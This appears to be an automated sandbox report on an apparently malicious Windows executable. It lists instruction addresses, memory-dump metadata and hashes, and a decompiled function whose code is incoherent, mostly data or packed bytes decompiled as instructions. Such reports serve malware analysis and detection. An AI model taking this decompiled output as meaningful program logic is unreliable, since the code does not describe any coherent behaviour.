0x0042a8e3
0x0042a875
0x0042a875
0x0042a876
0x0042a876
0x0042a876
0x0042a873
0x0042a86c
0x0042a86a
0x0042a868
0x0042a7de
0x0042a7de
0x0042a7de
0x0042a7de
0x0042a7dd
0x0042a7d7
0x0042a7d0
0x0042a7cd
0x0042a7cb
0x0042a7bd
0x0042a7b9
0x0042a7b7
0x0042a7b5
0x0042a7ab
0x0042a79a
0x0042a797
0x0042a71c
0x0042a71c
0x0042a71c
0x0042a6c5
0x0042a6c6
0x0042a6c7
0x0042a6c7
0x0042a6c8
0x0042a6c9
0x0042a6ca
0x0042a737
0x0042a737
0x0042a738
0x0042a739
0x0042a73b
0x0042a73e
0x0042a73f
0x0042a740
0x0042a6cc
0x0042a6cc
0x0042a6ce
0x0042a6ce
0x0042a6ca
0x0042a6c3
0x0042a6be
0x0042a6bb
0x0042a6ab
0x0042a6a5
0x0042a650
0x0042a650
0x0042a656
0x0042a656
0x0042a659
0x0042a65a
0x00000000
0x0042a65a
0x0042a61e
0x0042a61f
0x0042a61f
0x0042a620
0x0042a623
0x00000000
0x0042a623
0x0042a61c
0x0042a5b8
0x0042a5b8
0x0042a5b8
0x00000000
0x0042a5ba
0x0042a5ba
0x0042a5f0
0x0042a5f0
0x0042a5f2
0x0042a65b
0x0042a65b
0x0042a65d
0x0042a65e
0x0042a65e
0x0042a5f4
0x0042a5f4
0x0042a5fd
0x0042a5fd
0x0042a5bc
0x0042a5bc
0x0042a5c2
0x0042a5c4
0x0042a5c5
0x0042a5c7
0x0042a5ca
0x0042a5ca
0x0042a5ca
0x0042a5ca
0x0042a5cc
0x0042a5cd
0x0042a5cd
0x0042a5cd
0x0042a5ba
0x0042a5b8
0x0042a5b6
0x0042a550
0x0042a550
0x00000000
0x0042a550
0x0042a54e
0x0042a533
0x0042a527
0x0042a519
0x0042a517
0x0042a513
0x0042a511
0x0042a509
0x0042ab46
0x0042ab48
0x0042ab4a
0x0042ab50
0x0042ab52
0x0042ab58
0x0042ab58
0x0042ab58
0x0042ab5c
0x0042ab7e
0x0042ab7e
0x0042ab81
0x0042ab8a
0x0042ab8c
0x0042ab8d
0x0042ab8e
0x00000000
0x0042ab5e
0x0042ab5e
0x0042ab60
0x0042ab60
0x0042ab63
0x0042ab65
0x0042ab66
0x0042ab69
0x0042ab69
0x0042ab6c
0x0042ab6d
0x0042ab6f
0x0042ab72
0x0042ab75
0x0042ab76
0x0042ab79
0x0042ab7d
0x00000000
0x0042ab7d
0x0042ab8f
0x0042ab8f
0x0042ab93
0x0042ab99
0x0042ab9b
0x0042ab9c
0x0042ab9e
0x0042ab9f
0x0042aba0
0x0042aba1
0x0042aba5
0x0042aba7
0x0042aba7
0x0042abaa
0x0042abb0
0x0042abb3
0x0042abb4
0x0042abb4
0x0042abba
0x0042abc0
0x0042abc0
0x0042abc6
0x0042abc8
0x0042abd1
0x0042abd1
0x0042abd1
0x0042abd1
0x0042ab5e
0x0042abd4
0x0042abd5
0x0042abd6
0x0042abd7
0x0042abdd
0x0042abde
0x0042abe0
0x0042abe1
0x0042abe8
0x0042abef
0x0042abf0
0x0042abf1
0x0042abf2
0x0042abf5
0x0042abf7
0x0042abf9
0x0042abfa
0x0042abfb
0x0042abfc
0x0042abff
0x0042ac01
0x0042ac03
0x0042ac05
0x0042ac07
0x0042ac09
0x0042ac09
0x0042ac0e
0x0042ac13
0x0042ac15
0x0042ac1b
0x0042ac1d
0x0042ac24
0x0042ac2c
0x0042ac2d
0x0042ac32
0x0042ac37
0x0042ac39
0x0042ac3a
0x0042ac3d
0x0042ac3d
0x0042ac42
0x0042ac45
0x0042ac48
0x0042ac4a
0x0042ac4c
0x0042ac56
0x0042ac5e
0x0042ac61
0x0042ac66
0x0042ac67
0x0042ac69
0x0042ac6a
0x0042ac6a
0x0042ac6a
0x0042ac70
0x0042ac70
0x0042ac75
0x0042acec
0x0042acec
0x0042acef
0x0042acf1
0x0042acf2
0x00000000
0x0042ac78
0x0042ac78
0x0042ac7b
0x0042ac7e
0x0042ac81
0x0042ac84
0x0042ac88
0x0042ac88
0x0042ac8a
0x0042ac8b
0x0042ac8f
0x0042ac90
0x00000000
0x00000000
0x0042ac92
0x0042ac94
0x0042ac95
0x0042ac96
0x0042ac97
0x0042ac99
0x0042ac9c
0x0042ac9f
0x0042aca2
0x0042aca7
0x0042aca8
0x0042acad
0x0042acb0
0x0042acb4
0x0042acb5
0x0042acb6
0x0042acb8
0x00000000
0x0042acba
0x0042acba
0x0042acba
0x0042acbc
0x0042acbe
0x0042ad33
0x0042ad33
0x0042ad38
0x0042acc0
0x0042acc0
0x0042ad27
0x0042ad29
0x0042ad2a
0x00000000
0x0042ad2a
0x00000000
0x0042acc2
0x0042acc2
0x0042acc9
0x0042accb
0x0042accf
0x0042accf
0x0042acd2
0x0042ad2c
0x0042ad2c
0x0042ad2d
0x0042ad2d
0x0042ad2e
0x0042ad31
0x00000000
0x0042acd4
0x0042acd4
0x0042acd6
0x0042acd7
0x0042acd9
0x0042acdc
0x0042ace0
0x0042ace3
0x0042ace4
0x0042ace7
0x0042acea
0x00000000
0x0042aceb
0x0042acd2
0x0042acc0
0x0042acbe
0x00000000
0x0042acb8
0x0042acf3
0x0042acf3
0x0042acf6
0x0042acf7
0x0042acfa
0x0042acfd
0x0042acfe
0x0042acfe
0x0042acfe
0x0042ad01
0x0042ad13
0x0042ad13
0x00000000
0x0042ad13
0x0042ad03
0x0042ad06
0x0042ad0f
0x0042ad11
0x00000000
0x0042ad11
0x0042ad0f
0x0042ad15
0x0042ad15
0x00000000

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75da9d4e8c8c00f9657ae914ec4f66fda867b8d73ae308fa090fa44bdf4a0f2c
Instruction ID: ba838370ea93ef0368831e244eb716192a215f0df24f08e77d3c92a1d82679d0
Opcode Fuzzy Hash: 75da9d4e8c8c00f9657ae914ec4f66fda867b8d73ae308fa090fa44bdf4a0f2c
Instruction Fuzzy Hash: 25329BA0304AB12BD729DA21BA459337F58FBA33153D4568FDDC189123920D9CB3C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 0042A85C, Relevance: .6, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E0042A85C(signed int __ebx, signed int __ecx, signed char __edx, signed int __edi, signed int __esi, void* __eflags, char _a1, intOrPtr _a9, void* _a90, signed int _a111, signed int _a1144459010) {
				char _v1;
				signed char _t149;
				signed char _t152;
				signed int _t154;
				signed int _t156;
				signed int _t159;
				signed int _t161;
				void* _t168;
				void* _t173;
				signed int _t174;
				signed char _t178;
				void* _t179;
				void* _t181;
				signed int _t182;
				void* _t188;
				signed int _t190;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t205;
				signed int _t216;
				signed int _t217;
				void* _t224;
				signed char _t232;
				void* _t236;
				void* _t237;
				signed char _t238;
				void* _t241;
				signed int _t242;
				signed char _t243;
				void* _t247;
				signed int _t250;
				signed char _t255;
				signed char _t256;
				signed int _t263;
				signed int _t264;
				signed char _t269;
				signed int _t271;
				void* _t274;
				signed int _t276;
				signed int _t278;
				signed char _t283;
				signed int _t289;
				void* _t293;
				signed char _t294;
				void* _t302;
				signed int _t311;
				signed int _t324;
				signed int _t329;
				intOrPtr _t336;

				_t192 = __esi;
				_t189 = __edi;
				_t178 = __edx;
				_t170 = __ecx;
				_t165 = __ebx;
				if(__eflags > 0) {
					_t224 =  *((intOrPtr*)(_t149 + 0x31)) - _t170;
					if(_t224 < 0) {
						L47:
						_t189 = _t189 + 1;
						_t149 = _t149 ^ 0x0000004b;
						if(_t149 >= 0) {
							goto L65;
						} else {
							_t189 = _t189 - 1;
							_t241 =  *((intOrPtr*)(_t189 + 0x7b + _t178 * 2)) - _t178;
							if(_t241 <= 0) {
								goto L72;
							} else {
								_t178 = _t178 + 1;
								_t189 = _t189 + 1;
								_t242 = _t189;
								asm("insb");
								if(_t242 < 0) {
									goto L70;
								} else {
									_push(0x6b);
									_push(_t165);
									_push(_t165);
									_push(_t189);
									asm("aaa");
									asm("aaa");
									goto L52;
								}
							}
						}
					} else {
						_t205 = _t205 - 1;
						if(_t224 >= 0) {
							if (_t236 <= 0) goto L57;
							_t205 = _t205 - 1;
						} else {
							if(_t224 < 0) {
								_t205 = _t205 - 1;
								if(_t237 < 0) {
									goto L53;
								} else {
									_t205 = _t205 - 1;
									if(_t237 != 0) {
										goto L54;
									} else {
										_t192 = _t192 - 1;
										asm("insb");
										_t178 = (_t178 + 0x00000001 ^  *(_t149 + 0x44)) - 1;
										_t238 = _t178;
										if(_t238 == 0) {
											goto L63;
										} else {
											if(_t238 != 0) {
												goto L70;
											} else {
												goto L46;
											}
										}
									}
								}
							} else {
								if(_t224 < 0) {
									L46:
									_t170 = _t170 + 1;
									_t149 = _t149 ^ 0x00000079;
									asm("outsd");
									_push(_t205);
									_t205 =  *(_t192 + 0x62) * 0x42637548;
									_push(_t165);
									goto L47;
								} else {
									_t170 =  *[fs:esi+0x67] * 0x48;
									_t192 = _t192 - 1;
									asm("a16 dec eax");
									_t205 = _t205 - 1;
									goto L26;
								}
							}
						}
					}
				} else {
					_t192 = __esi - 1;
					_push(__ebx);
					_pop(_t149);
					_push(__ebx);
					_t189 = __edi + 1;
					asm("outsd");
					_t165 = __ebx - 1;
					_t216 = _t165;
					if(_t216 != 0) {
						L29:
						_push(_t205);
						_t195 =  *_t170 * 0x75424a4e;
						goto L31;
					} else {
						if(_t216 != 0) {
							L26:
							_t205 = _t205 - 1;
							_push(0x4e417a39);
							_push(_t165);
							_t170 = _t170 - 0x00000001 ^  *(_t189 + 0x35);
							_t149 = _t149 ^ 0x52315518;
							 *(_t170 + 0x71) =  *(_t170 + 0x71) ^ _t196;
							_push(_t205);
							asm("gs outsd");
							_t189 = _t189 + 1;
							_t178 = _t178 - 1;
							_push(0x73);
							if(_t178 >= 0) {
								L52:
								_pop(_t170);
								L53:
								_push(_t149);
								L54:
								_push(_t149);
								_t205 = _t205 + 1;
								_push(_t196);
								if(_t242 < 0) {
									_t178 = _t178 ^  *[fs:ebx+0x54];
									goto L75;
								} else {
									if(_t242 >= 0) {
										goto L69;
									} else {
										_push(0x77);
										_t178 = _t178 - 1;
										_t243 = _t178;
										_push(0x63736470);
										if(_t243 < 0) {
											L75:
											_t149 = _t149 ^ 0x0000007b;
											_t255 = _t149;
											goto L76;
										} else {
											if(_t243 >= 0) {
												L76:
												if(_t255 != 0) {
													goto L103;
												} else {
													asm("arpl [ebp+0x37], dx");
													if(_t255 >= 0) {
														goto L104;
													} else {
														_t205 = _t205 - 1;
														if(_t255 != 0) {
															goto L106;
														} else {
															if(_t255 == 0) {
																goto L105;
															} else {
																goto L80;
															}
														}
													}
												}
											} else {
												_t192 = _t192 - 1;
												if(_t192 >= 0) {
													goto L67;
												} else {
													_push(_t205);
													_t170 = _t165;
													asm("arpl [edx+0x74], bp");
													_t165 = _t165 + 1;
													_push(_t165);
													goto L62;
												}
											}
										}
									}
								}
							} else {
								asm("outsd");
								goto L29;
							}
						} else {
							if(_t216 >= 0) {
								 *(_t165 + 0x37) =  *(_t165 + 0x37) ^ _t189;
							} else {
								_push(_t192);
								 *[fs:esi+0x57] =  *[fs:esi+0x57] ^ __ecx;
								_t217 =  *[fs:esi+0x57];
								if(_t217 != 0) {
									L31:
									_t192 = _t195 - 1;
									_t178 = _t178 - 1 + 1;
									_t232 = _t178;
									if(_t232 != 0) {
										L62:
										_t247 =  *((intOrPtr*)(_t196 + 0x50 + _t170 * 2)) - _t178;
										asm("a16 inc esp");
										L63:
										_t205 = _t205 + 1;
										if(_t247 <= 0) {
											L80:
											_t149 =  *(_t192 + 0x64) * 0x34583866;
											_t256 = _t149;
											asm("outsb");
											if(_t256 > 0) {
												goto L102;
											} else {
												_pop(_t170);
												if(_t256 < 0) {
													goto L112;
												} else {
													if(_t256 < 0) {
														goto L96;
													} else {
														_push(_t205);
														_t192 = _t192 - 1;
														if(_t192 > 0) {
															_t192 = _t192 - 1 + 1;
															_pop(_t149);
															goto L115;
														} else {
															_t149 = _t149 ^ 0x00000078;
															_push(_t196);
															_t178 = _t178 + 1;
															goto L85;
														}
													}
												}
											}
										} else {
											_t178 = _t178 + 1;
											asm("insb");
											_t170 = (_t170 ^  *(_t189 + 0x66)) - 1;
											_push(0x63);
											_t189 = _t189 + 1;
											_push(_t192);
											_t192 = _t192 + 1;
											_push(_t196);
											 *_t192 =  *_t192 ^ _t178;
											 *(_t192 + 0x6d) =  *(_t192 + 0x6d) ^ _t178;
											_t149 = _t149 - 1;
											_push(_t165);
											L65:
											_t196 =  &_v1;
											_push(_t192);
											if(_t196 < 0) {
												L85:
												_t170 = _t205;
												asm("arpl [esi+0x4d], sp");
												_t178 = _t178 + 1;
												asm("outsb");
												if (_t178 != 0) goto L116;
												goto L86;
											} else {
												_push(_t205);
												asm("ss outsb");
												L67:
												asm("outsb");
												_t196 =  &_v1;
												_t250 = _t196;
												asm("insb");
												_push(_t178);
												asm("a16 inc edx");
												asm("aaa");
												if(_t250 == 0) {
													if(_t263 < 0) {
														goto L118;
													} else {
														if(_t263 != 0) {
															L108:
															if(_t269 > 0) {
																goto L132;
															} else {
																if(_t269 < 0) {
																	goto L140;
																} else {
																	if(_t269 == 0) {
																		goto L138;
																	} else {
																		_t178 = _t178 ^  *(_t149 + 0x4c);
																		_t170 = _t165;
																		if (_t178 == 0) goto L133;
																		L112:
																		_t192 = _t192 - 1;
																		_t271 = _t192;
																	}
																}
															}
														} else {
															_pop(_t170);
															_pop(_t149);
															_push(_t196);
															if(_t263 >= 0) {
																asm("outsd");
																_t165 = _t165 - 1;
																asm("insd");
																asm("outsb");
																_t149 = _t149 ^ 0x00000069;
																_t196 =  &_v1;
																asm("insb");
																_push(0x70563369);
																_t178 = _t178 + 1;
																_push(_t205);
																_t173 = _t170 - 1;
																goto L129;
															} else {
																 *_t165 =  *_t165 ^ _t192;
																_t189 = _t189 ^  *(_t170 + 0x41);
																_t264 = _t189;
																L96:
																if(_t264 != 0) {
																	L115:
																	_push(_t170);
																	_t192 = _t192 - 1;
																	asm("bound esp, [ebx+0x66]");
																	asm("o16 jnp 0x3b");
																} else {
																	if(_t264 < 0) {
																		goto L120;
																	} else {
																		_push(_t178);
																		_t205 = _t205 + 1;
																		if(_t264 <= 0) {
																			L129:
																			_t170 = _t173 + 1;
																			if(_t170 < 0) {
																				L159:
																				 *((intOrPtr*)(_t149 + _t149 + 0x6c)) =  *((intOrPtr*)(_t149 + _t149 + 0x6c)) + _t178;
																				 *_t196 =  *_t196 + _t149;
																				goto L160;
																			} else {
																				_t149 = _t149 ^ 0x7651584d;
																				_t182 =  *(_t170 + 0x6e) * 0x4e673743;
																				_push(_t170);
																				asm("outsb");
																				_t165 = _t165 + 1;
																				asm("aaa");
																				asm("a16 dec esi");
																				_t178 = _t182 + 1;
																				_t283 = _t178;
																				if(_t283 >= 0) {
																					goto L161;
																				} else {
																					L132:
																					_push(_t170);
																					if(_t283 > 0) {
																						if(_t293 < 0) {
																							goto L166;
																						} else {
																							_push(_t165);
																							if(_t293 > 0) {
																								 *((intOrPtr*)(_t149 + 0x10013800)) =  *((intOrPtr*)(_t149 + 0x10013800)) + _t165;
																								_t152 = _t149 + 0x39;
																								asm("sbb bl, [eax]");
																								 *_t170 =  *_t170 + _t152;
																							} else {
																								_push(_t165);
																								_t205 = _t205 - 1;
																								_t152 = _t149 ^ 0x00000066;
																								_t294 = _t152;
																								if(_t294 != 0) {
																									if(_t294 >= 0) {
																										if(_t294 < 0) {
																											 *_t152 =  *_t152 + _t152;
																											 *_t170 =  *_t170 + _t152;
																											 *_t152 =  *_t152 + _t152;
																											 *_t152 =  *_t152 + _t152;
																											 *_t152 =  *_t152 + _t152;
																											 *_t152 =  *_t152 + _t152;
																											 *_t152 =  *_t152 + _t152;
																											 *_t149 =  *_t149 + _t170;
																											 *_t149 =  *_t149 + _t149;
																											 *((intOrPtr*)(_t149 + 0x69 + _t149)) =  *((intOrPtr*)(_t149 + 0x69 + _t149)) + _t178;
																											goto L159;
																										}
																										goto L168;
																									}
																									goto L171;
																								}
																							}
																						}
																					} else {
																						_push(_t192);
																						_push(_t178);
																						_t196 =  &_v1;
																						_push(_t192);
																						if( *_t170 < _t165) {
																							goto L165;
																						} else {
																							asm("arpl [edi], si");
																							goto L137;
																						}
																					}
																				}
																			}
																		} else {
																			if(_t264 != 0) {
																				L125:
																				if (_t278 <= 0) goto L135;
																				 *(_t192 + 0x6f) =  *(_t192 + 0x6f) ^ _t149;
																			} else {
																				_push(_t205);
																				asm("insd");
																				asm("insb");
																				_t196 =  &_a1;
																				if(_t196 >= 0) {
																					if(_t276 != 0) {
																						goto L139;
																					} else {
																						if(_t276 < 0) {
																							L150:
																							_pop(_t178);
																						} else {
																							_pop(_t170);
																							_t178 = _t178 + 1;
																							if(_t178 < 0) {
																								_t149 = _t149 - 1;
																								asm("a16 dec esi");
																								_push(_t149);
																								if(_t149 < 0) {
																									goto L162;
																								} else {
																									_t293 =  *((intOrPtr*)(_t192 + 0x76)) - _t170;
																									asm("outsb");
																									asm("outsd");
																									if (_t293 < 0) goto L169;
																									goto L150;
																								}
																							} else {
																								_t192 = _t192 - 1;
																								_t278 = _t192;
																								goto L125;
																							}
																						}
																					}
																				} else {
																					_t165 = _t165 + 1;
																					asm("o16 jp 0x58");
																					L102:
																					_push(_t196);
																					L103:
																					_pop(_t178);
																					_push(_t192);
																					 *(_t170 + 0x6d) =  *(_t170 + 0x6d) ^ _t165;
																					L104:
																					_pop(_t170);
																					asm("insd");
																					_t192 =  *(_t170 + 0x34) * 0x47577553;
																					L105:
																					_push(_t189);
																					L106:
																					_t189 = _t189 + 1;
																					if(_t189 >= 0) {
																						L137:
																						asm("aaa");
																						_push(_t205);
																						L138:
																						asm("insb");
																						_t178 = _t178 + 1;
																						L139:
																						_t178 = _t178 - 1;
																						L140:
																						_t196 =  &_v1;
																						_t289 = _t196;
																						_push(_t205);
																						if(_t289 > 0) {
																							L160:
																							 *[gs:esi] =  *[gs:esi] + _t170;
																							L161:
																							 *[cs:esi] =  *[cs:esi] + _t170;
																							L162:
																							 *[cs:esi] =  *[cs:esi] + _t170;
																							 *_t178 =  *_t178 + _t170;
																							_t149 = _t149 |  *_t149;
																							 *_t149 =  *_t149 + _t149;
																							_t196 =  &_v1;
																							 *_t196 =  *_t196 + _t149;
																							_t302 =  *_t196;
																							if (_t302 >= 0) goto L164;
																							if (_t302 >= 0) goto L165;
																							L165:
																							asm("popad");
																							 *_t189 =  *_t189 + _t149;
																							L166:
																							 *[gs:esi] =  *[gs:esi] + _t170;
																							 *_t192 =  *_t192 + _t170;
																							 *_t192 =  *_t192 + _t170;
																							 *_t149 =  *_t149 + _t149;
																							 *_t149 =  *_t149 + _t149;
																							 *((intOrPtr*)(_t149 + _t149)) =  *((intOrPtr*)(_t149 + _t149)) + _t149;
																							 *_t149 =  *_t149 + _t149;
																							 *_t149 =  *_t149 + _t149;
																							 *_t149 =  *_t149 + _t149;
																							L168:
																							_t149 = _t149;
																							 *_t149 =  *_t149 + _t149;
																							 *_t165 =  *_t165 + _t178;
																							_t170 = _t170 + 1;
																							 *_t149 =  *_t149 + _t149;
																							_t149 = _t149 + 0xc4;
																							 *_t149 =  *_t149 + _t149;
																							if ( *_t149 != 0) goto L158;
																							L171:
																							_t170 = 0x1c40000;
																						} else {
																							if (_t289 < 0) goto L167;
																							_push(0x564c7167);
																						}
																					} else {
																						_t178 = _t178 ^  *[ss:0x58773952];
																						_t269 = _t178;
																						goto L108;
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												} else {
													_pop(_t149);
													L69:
													_push(_t178);
													if(_t250 >= 0) {
														L86:
														asm("arpl [edi+0x46], cx");
													} else {
														L70:
														_pop(_t149);
														_t174 =  *(_t149 + 0x69) * 0x00000074 ^  *(_t165 + 0x4a);
														if(_t174 != 0) {
															_t170 = _t174 - 1;
															if(_t170 >= 0) {
																_t178 = _t178 + 1;
																_t189 = _t189 - 1;
																_t149 = _t149 ^  *(_t165 + 0x70);
																_t274 =  *((intOrPtr*)(_t178 + 0x62)) - _t178;
																L118:
																if(_t274 != 0) {
																	_t179 = _t178 + 1;
																} else {
																	_t196 =  &_v1;
																	if (_t196 >= 0) goto L144;
																	L120:
																	_t189 = _t189 - 1;
																	_t276 = _t189;
																}
															} else {
																asm("bound ebp, [ecx+0x59]");
																_t165 =  *(_t170 + 0x7a) * 0x597c586b;
																_t263 = _t165;
															}
														} else {
															asm("outsd");
															_t170 = _t174 + 1;
															asm("outsd");
															_t205 = _t205 + 1;
															if (_t170 < 0) goto L90;
															L72:
															_push(_t149);
														}
													}
												}
											}
										}
									} else {
										if (_t232 > 0) goto L49;
										_t168 = _t165 - 1;
									}
								} else {
									if (_t217 <= 0) goto L27;
									_t188 = __edx - 1;
								}
							}
						}
					}
				}
				 *_t152 =  *_t152 + _t152;
				 *_t192 =  *_t192 + _t170;
				_pop(ds);
				_t197 = _t196 | _t170;
				 *(_t152 + 0xcd4c01) =  *(_t152 + 0xcd4c01) & _t189;
				_t69 = _t152 + 0x69 + _t197 * 2;
				 *_t69 =  *(_t152 + 0x69 + _t197 * 2) & 0xb400000e;
				_t311 =  *_t69;
				if(_t311 >= 0) {
					L179:
					_a111 = _a111 & _t170;
					asm("adc [cs:0x4240a0d], cl");
					_t152 = 0x7a;
					_pop(_t197);
					asm("cld");
					_t170 = _t170 & 0xb400000e;
					goto L180;
				} else {
					if(_t311 >= 0) {
						_t75 = _t189 + 0x67;
						 *_t75 =  *((intOrPtr*)(_t189 + 0x67)) + _t170;
						if( *_t75 >= 0) {
							asm("insd");
							 *(_t165 + 0x61) =  *(_t165 + 0x61) & _t152;
							_t79 = _t192 + 0x6e;
							 *_t79 =  *((intOrPtr*)(_t192 + 0x6e)) + _t170;
							asm("outsd");
							if( *_t79 != 0) {
								asm("bound esp, [ebp+0x20]");
								 *0xFFFFFFFFB4000083 =  *((intOrPtr*)(0xffffffffb4000083)) + 0xb400000e;
								asm("outsb");
								 *(_t170 + 0x6e) =  *(_t170 + 0x6e) & _t170;
								 *(_t152 + _t152 + 0x4f) =  *(_t152 + _t152 + 0x4f) & _t152;
								_push(_t165);
								goto L179;
							}
							L180:
							asm("aad 0x3e");
							 *0x8833fd03 = _t152;
							asm("int 0x86");
							asm("aas");
							 *_t189 =  *_t189 + _t170;
							asm("aaa");
							_t205 = _t205 + 1;
							_push(ss);
							_t152 =  *0x8833fd03 +  *_t189;
							_t170 = _t170 & _t165 ^ _t189;
							_t92 = _t152 + _t152;
							 *_t92 = _t165;
							asm("invalid");
							asm("invalid");
							asm("cld");
							_t165 =  *0x3b080f00;
							 *0x3b080f00 =  *_t92;
							_a1144459010 = _a1144459010 ^ _t165;
							asm("adc [esi+0xf003a82], eax");
						}
						asm("aaa");
						 *((intOrPtr*)(_t192 + 0x20070021)) =  *((intOrPtr*)(_t192 + 0x20070021)) + _t152;
						_t99 = _t165;
						_t165 = _t170;
						_t170 = _t99;
					}
				}
				_pop(es);
				asm("lodsd");
				_push(_t197);
				 *((intOrPtr*)(_t165 + 0x7024e87)) =  *((intOrPtr*)(_t165 + 0x7024e87)) - _t165;
				asm("insd");
				_t154 = _t152 +  *_t189;
				asm("lodsd");
				_push(_t197);
				do {
					asm("xlatb");
					_push(_t154);
					_t198 =  &_a1;
					 *_t154 =  *_t154 + _t154;
					 *_t192 =  *_t192 + _t154;
					 *_t154 =  *_t154 & _t154;
					asm("pushfd");
					asm("sti");
					_t170 = _t170 - 1;
					_pop(_t190);
					asm("loopne 0x2");
					 *0xb400000e =  *0xb400000e + _t154;
					 *_t165 =  *_t165 + _t170;
					 *_t192 =  *_t192 + _t170;
					asm("adc [eax], al");
					 *_t170 =  *_t170 ^ _t170;
				} while ( *_t170 < 0);
				asm("adc eax, [edx]");
				 *_t165 =  *_t165 + _t154;
				asm("adc [0x80400180], dh");
				 *_t154 =  *_t154 | _t154;
				 *(_t192 + 0x20581) =  *(_t192 + 0x20581) | 0x00000018;
				 *0x87078100 =  *0x87078100 + _t154;
				_t156 = _t154 +  *_t154 + 1;
				asm("adc eax, 0xa60303");
				asm("adc eax, 0x85400002");
				 *_t156 =  *_t156 + _t156;
				asm("aas");
				 *((intOrPtr*)(_t170 + _t156 * 4)) =  *((intOrPtr*)(_t170 + _t156 * 4)) + 0xb400000e;
				do {
					asm("adc eax, 0x8820386");
					 *_t192 =  *_t192 | 0x00000003;
					 *((intOrPtr*)(_t190 + _t192 * 2)) =  *((intOrPtr*)(_t190 + _t192 * 2)) + _t165;
					asm("adc [ecx], al");
					 *_t156 =  *_t156 + _t165;
					 *((intOrPtr*)(_t156 + 0x14f005)) =  *((intOrPtr*)(_t156 + 0x14f005)) + _t156;
					 *0xFFFFFFFFB4152010 =  *0xFFFFFFFFB4152010 | _t170;
					asm("sldt word [eax]");
					_t156 =  *0x1c000175;
					asm("aaa");
					asm("adc [edi], cl");
					_push(ss);
					_t124 = _t156 - 0x13fe8fad;
					 *_t124 =  *(_t156 - 0x13fe8fad) | _t156;
					_t324 =  *_t124;
					asm("adc al, 0x10");
				} while (_t324 == 0);
				if(_t324 < 0) {
					L194:
					asm("adc [ebx], al");
					_t159 = 0;
					_t192 = _t198;
					 *0xFFFFFFFFFFFFFFC2 =  *0xFFFFFFFFFFFFFFC2 << 0xce;
					goto L195;
				} else {
					asm("rol byte [esi], 0xab");
					 *[cs:edi] =  *[cs:edi] + _t165;
					 *_t190 =  *_t190 << 7;
					 *0xb400000e =  *0xb400000e >> 1;
					_t159 = _t156 | 0x0000200b;
					while(1) {
						 *_t159 =  *_t159 + _t159;
						asm("pushad");
						 *[cs:edx+0x64] =  *[cs:edx+0x64] + 0xb400000e;
						asm("popad");
						if( *[cs:edx+0x64] == 0) {
							break;
						}
						 *_t159 =  *_t159 + _t159;
						asm("into");
						asm("salc");
						_t170 = _t170 - 1;
						 *_t192 =  *_t192 + _t159;
						 *_t192 =  *_t192 >> 0x4a;
						asm("rol byte [ecx], 0x34");
						 *((intOrPtr*)(_t159 + _t159 * 8)) =  *((intOrPtr*)(_t159 + _t159 * 8)) + _t198;
						 *_t165 = 0xb400000e +  *_t165;
						_t165 = _t165 + 1;
						_t159 = _t159 + 2;
						asm("fcom dword [eax+0x55]");
						asm("ror byte [ebx-0x70], 0xc0");
						_pop(es);
						_push(es);
						 *_t190 =  *_t190 + _t159;
						if( *_t190 <= 0) {
							continue;
						} else {
							_t161 = _t159;
							_t329 = _t161;
							asm("loopne 0x30");
							if(_t329 < 0) {
								L205:
								 *_t165 =  *_t165 | _t198;
								__eflags = _t170 | _t161;
								return _t161;
							} else {
								if(_t329 < 0) {
									__eflags = 0xb400000e -  *_t170;
									if(0xb400000e ==  *_t170) {
										_t161 = _t161 + 1;
										_t170 = _t170 + 1;
										goto L203;
									}
									goto L204;
								} else {
									 *_t192 =  *_t192 + 0xc2;
									 *_t192 =  *_t192 + _t170;
									 *_t165 =  *_t165 + _t161;
									_t134 = _t161 + 0x2e;
									 *_t134 =  *(_t161 + 0x2e) | _t161;
									if( *_t134 < 0) {
										L203:
										_t170 = 0xb400000e + _t170;
										__eflags = _t170;
										L204:
										asm("int1");
										_t161 =  *_t161 & 0x000000ff;
										_t170 =  *_t170 & 0x000000ff;
										goto L205;
									} else {
										asm("gs insb");
										asm("outsd");
										 *0xb400000e =  *0xb400000e + _t170;
										 *_t192 =  *_t192 >> 0;
										asm("rol byte [eax], 0x5");
										 *_t161 =  *_t161 >> 0xb2;
										asm("into");
										 *0xFFFFFFFFB400003C =  *0xFFFFFFFFB400003C | _t161;
										asm("bound esi, [ebx+0x73]");
										asm("wait");
										goto L194;
									}
								}
							}
						}
						goto L206;
					}
					L195:
					_t181 = 0xb400000e + _t159;
					asm("into");
					 *(_t190 - 0x80) =  *(_t190 - 0x80) | _t190;
					 *((intOrPtr*)(_t181 + 9)) =  *((intOrPtr*)(_t181 + 9)) - _t159;
					asm("aas");
					_t146 = _t190 + 0x10;
					 *_t146 =  *((intOrPtr*)(_t190 + 0x10)) + _t190;
					_t336 =  *_t146;
					if(_t336 > 0) {
						L199:
						asm("rcr byte [ebp-0x3d], 0x8b");
						return _t159;
					}
					if(_t336 <= 0) {
						asm("adc [ebp], dl");
						if(_a9 == 0) {
							 *_t165 =  *_t165 + _t181;
							goto L199;
						}
					}
					return _t159;
				}
				L206:
			}

0x0042a85c
0x0042a85c
0x0042a85c
0x0042a85c
0x0042a85c
0x0042a85c
0x0042a8a4
0x0042a8a7
0x0042a925
0x0042a925
0x0042a926
0x0042a928
0x00000000
0x0042a92a
0x0042a92a
0x0042a92b
0x0042a92f
0x00000000
0x0042a931
0x0042a931
0x0042a932
0x0042a932
0x0042a933
0x0042a934
0x00000000
0x0042a937
0x0042a937
0x0042a939
0x0042a93a
0x0042a93b
0x0042a93c
0x0042a93d
0x00000000
0x0042a93d
0x0042a934
0x0042a92f
0x0042a8aa
0x0042a8aa
0x0042a8ab
0x0042a8fd
0x0042a8fe
0x0042a8ad
0x0042a8ad
0x0042a904
0x0042a905
0x00000000
0x0042a907
0x0042a907
0x0042a908
0x00000000
0x0042a90a
0x0042a90e
0x0042a90f
0x0042a910
0x0042a910
